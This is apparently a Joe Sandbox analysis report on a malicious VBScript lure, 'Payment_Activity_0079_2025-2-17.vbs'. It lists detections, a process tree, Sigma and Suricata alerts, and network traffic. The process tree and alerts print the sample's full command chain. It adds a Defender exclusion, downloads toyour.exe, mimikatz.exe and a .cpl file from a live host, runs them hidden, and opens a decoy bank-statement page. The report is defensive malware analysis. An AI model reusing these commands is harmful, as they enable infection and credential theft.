Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Activity_0079_2025-2-17.vbs

Overview

General Information

Sample name:Payment_Activity_0079_2025-2-17.vbs
Analysis ID:1617734
MD5:9603e23b554143665a1078fe9fa8564c
SHA1:27cbe63d36737f753a4bd30a882716127c009669
SHA256:8df082c3c269cbfbf7cd991409f599c37eb5ea8e0181671a7fec218885886bb3
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Adds a directory exclusion to Windows Defender
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Control Panel Items
Sigma detected: HackTool - Mimikatz Execution
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Connects to many different domains
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7972 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 8064 cmdline: "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8116 cmdline: powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement MD5: 04029E121A0CFA5991749937DD22A1D9)
        • msedge.exe (PID: 6944 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.scribd.com/document/806838445/Bank-Statement MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 1516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2948 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 8640 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6992 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3096 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7140 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 4420 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=5552 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 9356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7020 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 6116 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7216 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR MD5: 04029E121A0CFA5991749937DD22A1D9)
        • WmiPrvSE.exe (PID: 4296 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 2920 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4640 cmdline: powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 9304 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 9360 cmdline: powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 8952 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6516 cmdline: powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 9352 cmdline: "C:\Windows\System32\cmd.exe" /c start /b control C:\\WinXRAR\\ncpa.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • control.exe (PID: 8220 cmdline: control C:\\WinXRAR\\ncpa.cpl MD5: 11C18DBF352D81C9532A8EF442151CB1)
        • rundll32.exe (PID: 9208 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\\WinXRAR\\ncpa.cpl MD5: EF3179D498793BF4234F708D3BE28633)
    • cmd.exe (PID: 9344 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 9176 cmdline: powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4428 cmdline: "C:\Windows\System32\cmd.exe" /c start /b C:\\WinXRAR\\mimikatz.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7536 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Control Panel Items
Source: Process startedAuthor: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_): Data: Command: powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl, CommandLine: powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8952, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl, ProcessId: 6516, ProcessName: powershell.exe
Sigma detected: HackTool - Mimikatz Execution
Source: Process startedAuthor: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe, ProcessId: 9304, ProcessName: cmd.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR, ProcessId: 6116, ProcessName: cmd.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", ProcessId: 7972, ProcessName: wscript.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe, ProcessId: 2920, ProcessName: cmd.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR, ProcessId: 6116, ProcessName: cmd.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe, ProcessId: 2920, ProcessName: cmd.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs", ProcessId: 7972, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement, CommandLine: powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8064, ParentProcessName: cmd.exe, ProcessCommandLine: powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement, ProcessId: 8116, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7536, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:16:56.346308+010020221121Exploit Kit Activity Detected192.168.2.1049908104.244.42.67443TCP
2025-02-18T08:16:56.401395+010020221121Exploit Kit Activity Detected192.168.2.1049907162.159.140.229443TCP
2025-02-18T08:17:03.902700+010020221121Exploit Kit Activity Detected192.168.2.105007834.111.113.62443TCP
2025-02-18T08:17:05.076152+010020221121Exploit Kit Activity Detected192.168.2.1050107172.67.23.234443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:17:07.267604+010028450891A Network Trojan was detected192.168.2.1050157185.39.18.56443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:17:02.388192+010018100032Potentially Bad Traffic185.39.18.56443192.168.2.1050024TCP
2025-02-18T08:17:07.268891+010018100032Potentially Bad Traffic185.39.18.56443192.168.2.1050157TCP
2025-02-18T08:17:10.436051+010018100032Potentially Bad Traffic185.39.18.56443192.168.2.1050278TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:17:02.373425+010018100002Potentially Bad Traffic192.168.2.1050024185.39.18.56443TCP
2025-02-18T08:17:07.267604+010018100002Potentially Bad Traffic192.168.2.1050157185.39.18.56443TCP
2025-02-18T08:17:10.434759+010018100002Potentially Bad Traffic192.168.2.1050278185.39.18.56443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: unknownHTTPS traffic detected: 185.39.18.56:443 -> 192.168.2.10:50024 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.39.18.56:443 -> 192.168.2.10:50157 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.39.18.56:443 -> 192.168.2.10:50278 version: TLS 1.2

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2845089 - Severity 1 - ETPRO MALWARE Observed GET Request for mimikatz.exe : 192.168.2.10:50157 -> 185.39.18.56:443
Source: unknownNetwork traffic detected: DNS query count 31
Source: Joe Sandbox ViewIP Address: 23.199.48.23 23.199.48.23
Source: Joe Sandbox ViewIP Address: 98.82.156.207 98.82.156.207
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.10:49907 -> 162.159.140.229:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.10:49908 -> 104.244.42.67:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.10:50078 -> 34.111.113.62:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.10:50107 -> 172.67.23.234:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:50278 -> 185.39.18.56:443
Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.39.18.56:443 -> 192.168.2.10:50278
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:50024 -> 185.39.18.56:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:50157 -> 185.39.18.56:443
Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.39.18.56:443 -> 192.168.2.10:50024
Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.39.18.56:443 -> 192.168.2.10:50157
Source: global trafficHTTP traffic detected: GET /document/806838445/Bank-Statement HTTP/1.1Host: www.scribd.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /webpack/assets/fonts/source_sans_pro/regular/source_sans_pro_regular.latin.e8ecbdac.woff2 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /webpack/monolith/8260.0186aa9e3e0089f26ff6.css HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /webpack/assets/fonts/source_sans_pro/semibold/source_sans_pro_600.latin.76017e81.woff2 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en HTTP/1.1Host: cmp.osano.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v3/ HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /9mqqvt5eyodq34so/pages/1-b5a377eed6.jsonp HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
